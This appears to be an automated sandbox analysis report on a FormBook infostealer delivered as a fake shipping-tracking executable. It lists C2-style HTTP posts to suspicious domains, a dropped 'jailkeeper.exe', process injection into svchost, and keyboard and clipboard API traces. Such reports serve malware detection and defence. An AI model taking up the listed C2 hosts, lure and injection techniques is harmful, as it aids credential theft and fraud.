HTTP traffic detected: POST /fm31/ HTTP/1.1Host: www.medicaresbasics.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.medicaresbasics.xyzReferer: http://www.medicaresbasics.xyz/fm31/Cache-Control: no-cacheContent-Length: 212Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)Data Raw: 66 36 59 34 74 66 44 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 2f 65 38 6a 37 4c 41 5a 71 47 59 75 65 2f 2f 6d 50 58 71 48 71 38 48 75 4d 57 73 43 69 33 63 6f 51 33 41 4a 69 52 42 38 41 73 58 Data Ascii: f6Y4tfD=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX/e8j7LAZqGYue//mPXqHq8HuMWsCi3coQ3AJiRB8AsX

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 07:39:15 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 07:39:18 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 07:39:24 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Source: RXSytTjWIT.exe, 0000000E.00000002.3437986748.00000000007DF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.meliorahomes.net
Source: RXSytTjWIT.exe, 0000000E.00000002.3437986748.00000000007DF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.meliorahomes.net/ir1u/
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mobsync.exe, 0000000F.00000003.2989228468.00000000075EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=103363=c
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B14164

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00B14164
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00294164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		4_2_00294164

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B13F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B13F66

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B0001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B0001C

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B2CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00B2CABC
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		4_2_002ACABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3439275115.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2801297101.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800761539.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439303985.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3436884138.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800235122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439378043.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2839997588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00AA3B3A
Source: TNT AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a2aa296f-8
Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_d06be019-a
Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.2188089943.0000000003E03000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_689a6790-a
Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.2188089943.0000000003E03000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_7219ad26-f
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: This is a third-party compiled AutoIt script.	4_2_00223B3A
Source: jailkeeper.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: jailkeeper.exe, 00000004.00000000.2192258331.00000000002D4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_975a3a7f-4
Source: jailkeeper.exe, 00000004.00000000.2192258331.00000000002D4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_d9fcd329-d
Source: jailkeeper.exe, 0000000A.00000002.2371265465.00000000002D4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1c0ef833-2
Source: jailkeeper.exe, 0000000A.00000002.2371265465.00000000002D4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_626cbac4-7
Source: TNT AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_388f53bd-f
Source: TNT AWB TRACKING DETAILS.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_69457b70-7
Source: jailkeeper.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4b3068f6-4
Source: jailkeeper.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_62847191-8

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042C613 NtClose,	5_2_0042C613
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972B60 NtClose,LdrInitializeThunk,	5_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039735C0 NtCreateMutant,LdrInitializeThunk,	5_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03974340 NtSetContextThread,	5_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03974650 NtSuspendThread,	5_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972B80 NtQueryInformationFile,	5_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972BA0 NtEnumerateValueKey,	5_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972BF0 NtAllocateVirtualMemory,	5_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972BE0 NtQueryValueKey,	5_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972AB0 NtWaitForSingleObject,	5_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972AD0 NtReadFile,	5_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972AF0 NtWriteFile,	5_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972F90 NtProtectVirtualMemory,	5_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972FB0 NtResumeThread,	5_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972FA0 NtQuerySection,	5_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972FE0 NtCreateFile,	5_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972F30 NtCreateSection,	5_2_03972F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972F60 NtCreateProcessEx,	5_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972E80 NtReadVirtualMemory,	5_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972EA0 NtAdjustPrivilegesToken,	5_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972EE0 NtQueueApcThread,	5_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972E30 NtWriteVirtualMemory,	5_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972DB0 NtEnumerateKey,	5_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972DD0 NtDelayExecution,	5_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972D10 NtMapViewOfSection,	5_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972D00 NtSetInformationFile,	5_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972D30 NtUnmapViewOfSection,	5_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972CA0 NtQueryInformationToken,	5_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972CC0 NtQueryVirtualMemory,	5_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972CF0 NtOpenProcess,	5_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972C00 NtQueryInformationProcess,	5_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972C70 NtFreeVirtualMemory,	5_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972C60 NtCreateKey,	5_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03973090 NtSetValueKey,	5_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03973010 NtOpenDirectoryObject,	5_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039739B0 NtGetContextThread,	5_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03973D10 NtOpenProcessToken,	5_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03973D70 NtOpenThread,	5_2_03973D70

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B0A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00B0A1EF

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00AF8310

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00B051BD
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		4_2_002851BD

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AAE6A0	0_2_00AAE6A0
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00ACD975	0_2_00ACD975
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AAFCE0	0_2_00AAFCE0
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AADF00	0_2_00AADF00
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC21C5	0_2_00AC21C5
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AD62D2	0_2_00AD62D2
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B203DA	0_2_00B203DA
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AD242E	0_2_00AD242E
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC25FA	0_2_00AC25FA
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB66E1	0_2_00AB66E1
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AFE616	0_2_00AFE616
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AD878F	0_2_00AD878F
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B08889	0_2_00B08889
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB8808	0_2_00AB8808
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B20857	0_2_00B20857
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AD6844	0_2_00AD6844
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00ACCB21	0_2_00ACCB21
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AD6DB6	0_2_00AD6DB6
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB6F9E	0_2_00AB6F9E
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB3030	0_2_00AB3030
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC3187	0_2_00AC3187
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00ACF1D9	0_2_00ACF1D9
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AA1287	0_2_00AA1287
